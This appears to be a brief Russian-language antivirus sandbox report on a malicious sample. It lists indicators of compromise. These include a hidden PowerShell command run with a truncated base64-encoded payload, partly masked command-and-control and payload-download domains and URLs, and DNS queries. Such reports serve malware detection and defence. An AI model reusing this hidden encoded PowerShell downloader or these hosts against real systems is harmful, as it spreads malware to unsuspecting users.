Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABPAGsAcQBoAHEAcQB5AGwAZQB1AHoAYwB5AD0AJwBOAGUAYQBqAHIAegBhAGoAaQB3AG8AdgBvACcAOwAkAEgAbwBsAHgAbABtAG0AZwAgAD0AIAAnADcAOQAwACcAOwAkAEIAZABwAHAAbwB2AHAAawBiAGI...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1576
- %TEMP%\1172409.cvr
- 'wa#########d-cycles.000webhostapp.com':443
- 'yi###lawyer.com':80
- http://www.yi###lawyer.com/aspnet_client/jho-xn0q-0120953794/
- 'wa#########d-cycles.000webhostapp.com':443
- DNS ASK su####corredores.cl
- DNS ASK wa#########d-cycles.000webhostapp.com
- DNS ASK ak####turizm.com
- DNS ASK bi##123.pw
- DNS ASK yi###lawyer.com